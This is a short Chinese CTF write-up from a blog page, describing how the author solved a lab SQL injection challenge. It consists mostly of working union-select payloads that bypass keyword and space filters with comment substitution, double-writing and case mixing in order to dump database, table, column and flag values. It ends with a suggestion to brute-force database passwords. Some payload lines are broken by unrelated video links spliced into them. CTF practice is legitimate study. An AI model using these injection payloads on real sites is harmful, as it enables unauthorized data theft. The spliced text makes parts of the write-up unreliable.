技术心得:实验室每日一题WP

简介: 技术心得:实验室每日一题WP

"

打开题目,直接受到物理攻击。看到网页左下角提示

于是尝试sql注入,/?id=1;得到回显,/?id=//代码效果参考:https://v.youku.com/v_show/id_XNjQwNjgyMTc5Ng==.html

1' ;无回显,判断为数//代码效果参考: https://v.youku.com/v_show/id_XNjQwMDM2Mzg2MA==.html

字型注入。

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

尝试查询字段数,经尝试过滤了空格 or ,于是用/**/代替空格 和双写绕过。

?id=1//oorderrder//by/**/1得到回显

测试为3个字段数,然后查询回显,发现select和union被过滤,发现双写绕过不行,于是尝试大小写绕过

?id=1//Union//Select/**/1,2,3

发现2,3为回显位,于是查询当前数据库名。

?id=1//Union//Select/**/1,2,database()

得到数据库名 text

查询表名

?id=1//Union//Select//1,2,group_concat(table_name)//frfromom//information_schema.tables//where/**/table_schema='text'

得到flag,users

获取列名

?id=1//uNion//Select//1,2,group_concat(column_name)//frfromom//information_schema.columns//where/**/table_name=%27flag%27

id,flag

查询字段值

?id=1//uNion//Select//1,2,flag//frfromom/**/flag

得到flag

flag{You have successfully!!!}

下次可以尝试直接爆破数据库密码了


"
image.png
相关文章
|
30天前
|
开发框架 监控 Kubernetes
CTF本地靶场搭建——GZ:CTF基础使用
GZ::CTF是一个基于ASP.NET Core的开源CTF竞赛平台,支持Docker或K8s容器部署,提供静态和动态题目类型,包括静态附件、动态附件、静态容器和动态容器,具备动态分值功能,如三血奖励和动态flag作弊检测。平台还具有实时通知、邮件验证、用户权限管理、Writeup收集、流量代理转发等功能。此外,它包含比赛管理、队伍管理、用户管理等多个管理模块,适合举办和参与网络安全竞赛。
|
1月前
|
网络安全
2024年---蓝桥杯网络安全赛道部分WP
2024年---蓝桥杯网络安全赛道部分WP
|
8月前
BUUCTF-PWN-WP
BUUCTF-PWN-WP
29 2
|
8月前
【杂谈】恭喜自己获得CSDN专家称号,努力终会换来结果
【杂谈】恭喜自己获得CSDN专家称号,努力终会换来结果
41 0
【杂谈】恭喜自己获得CSDN专家称号,努力终会换来结果
|
9月前
|
安全 网络安全 网络虚拟化
CTF学习和比赛平台简介
CTF学习和比赛平台简介
537 1
|
10月前
bugku-聪明的小🐏-wp
bugku-聪明的小🐏-wp
|
数据可视化 程序员 Linux
全球 77.5% 的网站都在用 PHP;百度一程序员删库被判 9 个月;OpenCV 4.6 发布 | 思否周刊
全球 77.5% 的网站都在用 PHP;百度一程序员删库被判 9 个月;OpenCV 4.6 发布 | 思否周刊
159 0
斯坦福 CS183 Peter Thiel 创业课资料整理
原始课程笔记(英文): http://blakemasters.com/peter-thiels-cs183-startup 36kr 的笔记翻译(前六章): http://get.
1165 0
|
Ubuntu 机器人 大数据
CS计算机专业的常用的竞赛和学习网站(最全汇总)-博主自用
CS计算机专业的常用的竞赛和学习网站(最全汇总)-博主自用
536 0
|
Web App开发 存储 缓存
身家过亿的帝都王子来到1024盛宴-小码农献上linux进阶知识点一篇
身家过亿的帝都王子来到1024盛宴-小码农献上linux进阶知识点一篇
111 0
身家过亿的帝都王子来到1024盛宴-小码农献上linux进阶知识点一篇